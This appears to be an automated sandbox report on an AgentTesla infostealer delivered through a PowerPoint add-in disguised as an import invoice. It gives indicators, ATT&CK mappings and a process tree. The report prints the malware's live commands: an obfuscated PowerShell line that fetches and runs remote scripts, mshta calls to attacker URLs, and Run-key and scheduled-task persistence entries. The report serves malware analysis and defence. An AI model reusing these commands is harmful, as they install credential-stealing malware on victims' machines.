agenttesla | 0cabc6544bb554fc6900c766ade30bee9bd403f64231e87b65fc9182128d7515

General

Target

Import Invoice Duty and Clearance.ppam
Size

8KB
MD5

7659d46dbf1d34e7833e4b0b2968f281
SHA1

05f65097aefb7a9c8269ef63d7aec4764079b970
SHA256

0cabc6544bb554fc6900c766ade30bee9bd403f64231e87b65fc9182128d7515
SHA512

db5f925cd241e429593c18148f9b9ded717ef87bf935a9d134579d1139c23292201803104910896ef4ecde4891735690b2826f82cefb6762d61763244e94e4ec

Score

10^/10

agenttesla collection keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3616	2180	mshta.exe	POWERPNT.EXE

AgentTesla Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3628-325-0x000000000043755E-mapping.dmp	family_agenttesla
behavioral2/memory/1300-392-0x000000000043755E-mapping.dmp	family_agenttesla
behavioral2/memory/1300-398-0x0000000005160000-0x000000000565E000-memory.dmp	family_agenttesla

Blocklisted process makes network request 15 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
28	3616	mshta.exe
29	3616	mshta.exe
33	3616	mshta.exe
36	3616	mshta.exe
38	3616	mshta.exe
40	3616	mshta.exe
41	3616	mshta.exe
43	3616	mshta.exe
47	3616	mshta.exe
48	3616	mshta.exe
50	3616	mshta.exe
52	3616	mshta.exe
54	3616	mshta.exe
56	3396	powershell.exe
59	3616	mshta.exe

Drops file in Drivers directory 2 IoCs

Processes:

jsc.exeRegAsm.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegAsm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exejsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_8f22087a2c0740eba07c3aea05e107e7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_959babd593ed4cd49dd3b6a0f1146d59.txt').GetResponse().GetResponseStream()).ReadToend());"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\""	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 3396 set thread context of 3628	3396	powershell.exe	jsc.exe
PID 3396 set thread context of 1300	3396	powershell.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1420 schtasks.exe

pid	process
1420	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3188 taskkill.exe
3344 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

2180 POWERPNT.EXE
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

dw20.exepowershell.exejsc.exeRegAsm.exe

pid process

2528 dw20.exe
2528 dw20.exe
3396 powershell.exe
3396 powershell.exe
3396 powershell.exe
3628 jsc.exe
3628 jsc.exe
1300 RegAsm.exe
1300 RegAsm.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

RegAsm.exe

pid process

1300 RegAsm.exe

pid	process
3188	taskkill.exe
3344	taskkill.exe

pid	process
2180	POWERPNT.EXE

pid	process
2528	dw20.exe
2528	dw20.exe
3396	powershell.exe
3396	powershell.exe
3396	powershell.exe
3628	jsc.exe
3628	jsc.exe
1300	RegAsm.exe
1300	RegAsm.exe

pid	process
1300	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	3188	taskkill.exe
Token: SeDebugPrivilege	3344	taskkill.exe
Token: SeDebugPrivilege	3396	powershell.exe
Token: SeDebugPrivilege	3628	jsc.exe
Token: SeDebugPrivilege	1300	RegAsm.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

POWERPNT.EXE

pid process

2180 POWERPNT.EXE
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

POWERPNT.EXEjsc.exeRegAsm.exe

pid process

2180 POWERPNT.EXE
2180 POWERPNT.EXE
2180 POWERPNT.EXE
3628 jsc.exe
1300 RegAsm.exe

pid	process
2180	POWERPNT.EXE

pid	process
2180	POWERPNT.EXE
2180	POWERPNT.EXE
2180	POWERPNT.EXE
3628	jsc.exe
1300	RegAsm.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.execsc.exe

description	pid	process	target process
PID 2180 wrote to memory of 3616	2180	POWERPNT.EXE	mshta.exe
PID 2180 wrote to memory of 3616	2180	POWERPNT.EXE	mshta.exe
PID 3616 wrote to memory of 3188	3616	mshta.exe	taskkill.exe
PID 3616 wrote to memory of 3188	3616	mshta.exe	taskkill.exe
PID 3616 wrote to memory of 3344	3616	mshta.exe	taskkill.exe
PID 3616 wrote to memory of 3344	3616	mshta.exe	taskkill.exe
PID 3616 wrote to memory of 1420	3616	mshta.exe	schtasks.exe
PID 3616 wrote to memory of 1420	3616	mshta.exe	schtasks.exe
PID 3616 wrote to memory of 2528	3616	mshta.exe	dw20.exe
PID 3616 wrote to memory of 2528	3616	mshta.exe	dw20.exe
PID 3616 wrote to memory of 3396	3616	mshta.exe	powershell.exe
PID 3616 wrote to memory of 3396	3616	mshta.exe	powershell.exe
PID 3396 wrote to memory of 3628	3396	powershell.exe	jsc.exe
PID 3396 wrote to memory of 3628	3396	powershell.exe	jsc.exe
PID 3396 wrote to memory of 3628	3396	powershell.exe	jsc.exe
PID 3396 wrote to memory of 3628	3396	powershell.exe	jsc.exe
PID 3396 wrote to memory of 3628	3396	powershell.exe	jsc.exe
PID 3396 wrote to memory of 3628	3396	powershell.exe	jsc.exe
PID 3396 wrote to memory of 3628	3396	powershell.exe	jsc.exe
PID 3396 wrote to memory of 3628	3396	powershell.exe	jsc.exe
PID 3396 wrote to memory of 2012	3396	powershell.exe	csc.exe
PID 3396 wrote to memory of 2012	3396	powershell.exe	csc.exe
PID 2012 wrote to memory of 1864	2012	csc.exe	cvtres.exe
PID 2012 wrote to memory of 1864	2012	csc.exe	cvtres.exe
PID 3396 wrote to memory of 1300	3396	powershell.exe	RegAsm.exe
PID 3396 wrote to memory of 1300	3396	powershell.exe	RegAsm.exe
PID 3396 wrote to memory of 1300	3396	powershell.exe	RegAsm.exe
PID 3396 wrote to memory of 1300	3396	powershell.exe	RegAsm.exe
PID 3396 wrote to memory of 1300	3396	powershell.exe	RegAsm.exe
PID 3396 wrote to memory of 1300	3396	powershell.exe	RegAsm.exe
PID 3396 wrote to memory of 1300	3396	powershell.exe	RegAsm.exe
PID 3396 wrote to memory of 1300	3396	powershell.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Import Invoice Duty and Clearance.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2180

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwdwdrufhjwijjd
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3616

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3188

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3344

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 2932
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_8f22087a2c0740eba07c3aea05e107e7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_959babd593ed4cd49dd3b6a0f1146d59.txt').GetResponse().GetResponseStream()).ReadToend());
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3396

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3628

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4qcyrxrj\4qcyrxrj.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2012

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES21BD.tmp" "c:\Users\Admin\AppData\Local\Temp\4qcyrxrj\CSC8FAB9AA34374446FA246EFC3ABFA7A2C.TMP"
5⤵
PID:1864

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:1300

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/13.html\""
3⤵
- Creates scheduled task(s)
PID:1420

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

3

T1081

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Data from Local System

3

T1005

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4qcyrxrj\4qcyrxrj.dll
MD5
63bef306b2ee0a524554005e6dd9c1ce

SHA1
07e31a8422aa3e3d9358c26316e50a739e4e63ad

SHA256
268febd32f59e672cccdba452784d588e9dab5eeaae82f38890974087cd6985c

SHA512
d5aad6a7f8d32d0e0299b28e8626ff8b1fbdd15f98ef41f33f47c0210980fbef1569fd2241de10604750555affd9effa04e7bf501e2e85631fbb3a2f60abdd20

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES21BD.tmp
MD5
bd4bbfa1cc7bbe74305dd660f55744b0

SHA1
8792b2a7825663bb56956573d73b273c088f70a5

SHA256
d504063bd7f6bb1eaf1af24c81be2f15da8cc86086f4c271de774079bd315baa

SHA512
062694d2cc8efe0237f96e311e73a60da76ce8ee05e25030560fe9377cade3093829e8b910bb60bb8ff61fbe4c87db74d1eb159933d653a7347b67f6ad119ec0

Download Submit
C:\Windows\system32\drivers\etc\hosts
MD5
5b2d17233558878a82ee464d04f58b59

SHA1
47ebffcad0b4c358df0d6a06ef335cb6aab0ab20

SHA256
5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542

SHA512
d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4qcyrxrj\4qcyrxrj.0.cs
MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4qcyrxrj\4qcyrxrj.cmdline
MD5
459c97f179f9c12282a27b7cc0dab67f

SHA1
799b332b28ff23a9ed14a2e69d3ae3c695979760

SHA256
f2cabcecc16fb57fcb635dfbc240a03af5074d1cbd8c2ac43bd32847493c277f

SHA512
698af230c41335009eda7993d26e0d6aefb1a3ed8f5e2e4b96847cb831a502817b42d8381821691e930e60dd320fc00050ef13283446eb90c8e0671d5a52866f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4qcyrxrj\CSC8FAB9AA34374446FA246EFC3ABFA7A2C.TMP
MD5
519d23770cc733c630736c259f5be250

SHA1
8349bbfff0f12cb4251864246ecb29749acab772

SHA256
f4e91e4bfd403ce5b8c3ad60c942f54ad82e5546ed8cd228b16f8822553ad9b7

SHA512
8890c88f1918ed59310b417a6ae38015baefd7d22f2b13a8278b3f99acbf75dce96ecc466af01cc22ef656a6d8d9837be878db5cb298c8519978ed0f12a6e499

Download Submit
memory/1300-409-0x0000000005160000-0x000000000565E000-memory.dmp

Filesize
5.0MB

Download
memory/1300-398-0x0000000005160000-0x000000000565E000-memory.dmp

Filesize
5.0MB

Download
memory/1300-392-0x000000000043755E-mapping.dmp

Download
memory/1420-296-0x0000000000000000-mapping.dmp

Download
memory/1864-386-0x0000000000000000-mapping.dmp

Download
memory/2012-383-0x0000000000000000-mapping.dmp

Download
memory/2180-128-0x00007FF91FDB0000-0x00007FF91FDC0000-memory.dmp

Filesize
64KB

Download
memory/2180-120-0x00000272894C0000-0x00000272894C2000-memory.dmp

Filesize
8KB

Download
memory/2180-116-0x00007FF923170000-0x00007FF923180000-memory.dmp

Filesize
64KB

Download
memory/2180-117-0x00007FF923170000-0x00007FF923180000-memory.dmp

Filesize
64KB

Download
memory/2180-118-0x00007FF923170000-0x00007FF923180000-memory.dmp

Filesize
64KB

Download
memory/2180-119-0x00007FF923170000-0x00007FF923180000-memory.dmp

Filesize
64KB

Download
memory/2180-121-0x00000272894C0000-0x00000272894C2000-memory.dmp

Filesize
8KB

Download
memory/2180-122-0x00000272894C0000-0x00000272894C2000-memory.dmp

Filesize
8KB

Download
memory/2180-115-0x00007FF923170000-0x00007FF923180000-memory.dmp

Filesize
64KB

Download
memory/2180-129-0x00007FF91FDB0000-0x00007FF91FDC0000-memory.dmp

Filesize
64KB

Download
memory/2180-257-0x0000027296E40000-0x0000027296E44000-memory.dmp

Filesize
16KB

Download
memory/2528-297-0x0000000000000000-mapping.dmp

Download
memory/3188-294-0x0000000000000000-mapping.dmp

Download
memory/3344-295-0x0000000000000000-mapping.dmp

Download
memory/3396-317-0x00000212A40F6000-0x00000212A40F8000-memory.dmp

Filesize
8KB

Download
memory/3396-312-0x00000212A40F3000-0x00000212A40F5000-memory.dmp

Filesize
8KB

Download
memory/3396-311-0x00000212A40F0000-0x00000212A40F2000-memory.dmp

Filesize
8KB

Download
memory/3396-298-0x0000000000000000-mapping.dmp

Download
memory/3616-263-0x0000000000000000-mapping.dmp

Download
memory/3628-382-0x0000000004DF0000-0x00000000052EE000-memory.dmp

Filesize
5.0MB

Download
memory/3628-325-0x000000000043755E-mapping.dmp

Download
memory/3628-408-0x0000000004DF0000-0x00000000052EE000-memory.dmp

Filesize
5.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads